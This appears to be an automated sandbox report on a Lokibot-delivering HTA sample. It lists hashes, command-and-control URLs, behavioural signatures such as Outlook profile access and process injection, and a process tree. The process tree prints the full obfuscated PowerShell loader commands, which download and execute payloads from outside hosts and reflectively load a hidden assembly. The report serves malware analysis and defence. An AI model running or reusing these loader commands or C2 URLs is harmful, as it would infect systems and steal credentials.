Analysis
-
max time kernel
95s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2024 01:14
Static task
static1
Behavioral task
behavioral1
Sample
ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669.hta
Resource
win10v2004-20241007-en
General
-
Target
ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669.hta
-
Size
178KB
-
MD5
5476ba599869d81abee08f38f1c1a1d9
-
SHA1
46748779ec123145fdf90942c9df65d0099c9a99
-
SHA256
ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669
-
SHA512
516531534bee5995295659464f480c6d12909668fdb623c0c02dd93c9055df7bb203833e4e84416b31ef923dff8057f76f0e850bb84c53096cac43cdf2d04edd
-
SSDEEP
96:4vCl172Xu01IhxXYcQu01IhPXYZxd7b2+sMdHeu01IhLu01Ih5XY4u01Iht5Q:4vCldarG1QrGsx92+KrGLrGZrGLQ
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Extracted
lokibot
http://94.156.177.95/simple/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 3 IoCs
Processes:
POwERsHeLl.EXEpowershell.exeflow pid process 15 3756 POwERsHeLl.EXE 22 1892 powershell.exe 31 1892 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2444 powershell.exe 1892 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
Processes:
POwERsHeLl.EXEpowershell.exepid process 3756 POwERsHeLl.EXE 3180 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation mshta.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook aspnet_compiler.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1892 set thread context of 4944 1892 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
csc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exePOwERsHeLl.EXEpowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POwERsHeLl.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
POwERsHeLl.EXEpowershell.exepowershell.exepowershell.exepid process 3756 POwERsHeLl.EXE 3756 POwERsHeLl.EXE 3180 powershell.exe 3180 powershell.exe 2444 powershell.exe 2444 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
POwERsHeLl.EXEpowershell.exepowershell.exepowershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 3756 POwERsHeLl.EXE Token: SeDebugPrivilege 3180 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeDebugPrivilege 4944 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
mshta.exePOwERsHeLl.EXEcsc.exeWScript.exepowershell.exepowershell.exedescription pid process target process PID 5116 wrote to memory of 3756 5116 mshta.exe POwERsHeLl.EXE PID 5116 wrote to memory of 3756 5116 mshta.exe POwERsHeLl.EXE PID 5116 wrote to memory of 3756 5116 mshta.exe POwERsHeLl.EXE PID 3756 wrote to memory of 3180 3756 POwERsHeLl.EXE powershell.exe PID 3756 wrote to memory of 3180 3756 POwERsHeLl.EXE powershell.exe PID 3756 wrote to memory of 3180 3756 POwERsHeLl.EXE powershell.exe PID 3756 wrote to memory of 1964 3756 POwERsHeLl.EXE csc.exe PID 3756 wrote to memory of 1964 3756 POwERsHeLl.EXE csc.exe PID 3756 wrote to memory of 1964 3756 POwERsHeLl.EXE csc.exe PID 1964 wrote to memory of 2528 1964 csc.exe cvtres.exe PID 1964 wrote to memory of 2528 1964 csc.exe cvtres.exe PID 1964 wrote to memory of 2528 1964 csc.exe cvtres.exe PID 3756 wrote to memory of 2612 3756 POwERsHeLl.EXE WScript.exe PID 3756 wrote to memory of 2612 3756 POwERsHeLl.EXE WScript.exe PID 3756 wrote to memory of 2612 3756 POwERsHeLl.EXE WScript.exe PID 2612 wrote to memory of 2444 2612 WScript.exe powershell.exe PID 2612 wrote to memory of 2444 2612 WScript.exe powershell.exe PID 2612 wrote to memory of 2444 2612 WScript.exe powershell.exe PID 2444 wrote to memory of 1892 2444 powershell.exe powershell.exe PID 2444 wrote to memory of 1892 2444 powershell.exe powershell.exe PID 2444 wrote to memory of 1892 2444 powershell.exe powershell.exe PID 1892 wrote to memory of 948 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 948 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 948 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4504 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4504 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4504 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4944 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4944 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4944 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4944 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4944 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4944 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4944 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4944 1892 powershell.exe aspnet_compiler.exe PID 1892 wrote to memory of 4944 1892 powershell.exe aspnet_compiler.exe -
outlook_office_path 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook aspnet_compiler.exe -
outlook_win_path 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook aspnet_compiler.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\SysWOW64\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE"C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\grwfjnff\grwfjnff.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD12.tmp" "c:\Users\Admin\AppData\Local\Temp\grwfjnff\CSC1CF728A332DE47BAA5CB87D0FBF284F7.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:2528
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵PID:948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵PID:4504
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4944
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
12KB
MD5181b25afd1eb1f7171177de7b0d78093
SHA1cb187ae4309e2a9c20ca0a37519d807e2d86a5a4
SHA25644b74326388baa8be1026cbc9021fb68e27f22287a49d6f50d309d31aecf49c2
SHA512ccec6e3cfbbef9e21af470b03e737536dbfa7c41eb42e1eec584714d363d41d06fd09a8c1dd9c755b1f3ae3382b2f37b752a4ece12908104fd605b358f79a814
-
Filesize
17KB
MD503c88f80647a415bc67137d9b35ef045
SHA1625f6cceb57820c8954e5156d30cbbbb36f2e135
SHA256e6e1fbbe02d81b38d0b2e3761bd4f643d3dcf700be0b7dabd500da0a34e1ae4b
SHA512a5685da17b54a08b1da06f51cf074cd907b30c60011530100a5d9ef68c82e447ccc498768ec3780c9e504222d794df954fdefd3149d68a3994648be0527fadcb
-
Filesize
1KB
MD51dc6a6bcfd50bc54a31a0cec76c35f7e
SHA10a80c39cd082aefda00c79fbcf6eb05f5f569616
SHA256b6933042c38322eff59629a700c9949373622787f5c2653525542083eb8fae51
SHA512362d32e44a66875fe988261cfe5d301ee368c65262c046eded0ef4fe9f8639787e9f46307a3ab2eed29995b743d3aff742e100f53bbdfcf057475a4fa11c1e9c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD505130c50106e1f5a67a1d753f4882eb3
SHA14167013441b97adce38e371395048a4fe9523487
SHA2562d02a936ca186e3bd19c80fad55b27cd44082103aae05c2fc6186a7e022fd381
SHA512590e427272b2294d68248ba8f32cf0c312599785f40a79fdcae0f9335b478e7d04ec9d7840673382c566fbe6d9b1748e4e1c0c810d5ea589f1e8ccbd2a66bf04
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3442511616-637977696-3186306149-1000\0f5007522459c86e95ffcc62f32308f1_5ab270f5-f3a9-47d1-97d7-bbd50acf9955
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3442511616-637977696-3186306149-1000\0f5007522459c86e95ffcc62f32308f1_5ab270f5-f3a9-47d1-97d7-bbd50acf9955
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
140KB
MD57450b95ac8fa59e12e46a4c2a6cf36ed
SHA1f1e5ec3acdd59283ccaf7611f572ccbbd4009b63
SHA25612a0a30bf86b8a8eb35e4309a523faf7673c467dc623f3cfb09fcd45fc4fc139
SHA512951b71eddd8c390e9bb37585f8865e7e7343a967a62321edd74b06d9474df3f0c8c5440a91e96d672d5369b181828c655f28d233f5e3a5fb6945c48ef808b754
-
Filesize
652B
MD59449dbffc90608e752d17df4b00cd996
SHA143f0bf275f0810494d945a686c2fda5aa092305a
SHA256f6f5997b5b80d31fed268fb47c839933d83c6500aab4406caf4ac74435b7ffa1
SHA51292ffb6929f3c58cf5005d41be632d9125c4b79585e431be337701493ba7293ee4e25a28945d9d85d02b7c4e9267b549eefa0e7efd238514ad1777b148c9fdd45
-
Filesize
484B
MD58fc8053789ede73b926da0b3d6b6ab73
SHA1feb5351771dc5474c1e18579123e3a5320b12120
SHA256da39f89715a7d00579cddd1c02ab586ed7b0c24618cb54555cd37a50d92dc9ab
SHA512271ce0712b57e18229515700cc941d34534ce5b0f6209c086b3f71e93a32ae70882c537ac416b96d08b8c4cc25064c6870336a30b3512c1a932a4445b2468644
-
Filesize
369B
MD56e1a7a7f61c1dc50c3a146dd7dc688ed
SHA1b0cff806cc3c1600613a11b7c1be49186bcd29b0
SHA256598be4f1a57dd8d6fb8b06a4059853a66d210ae23573ce47a3953b0fd9fe0704
SHA5124dd794de6b31e2317bf935f214d856aeed5cf4ca9351f418ef3dd757bfccb69846fe7c2e8d60e9a132feaf61df83cdba17ec82e58cabb0529a94f0342b49e39d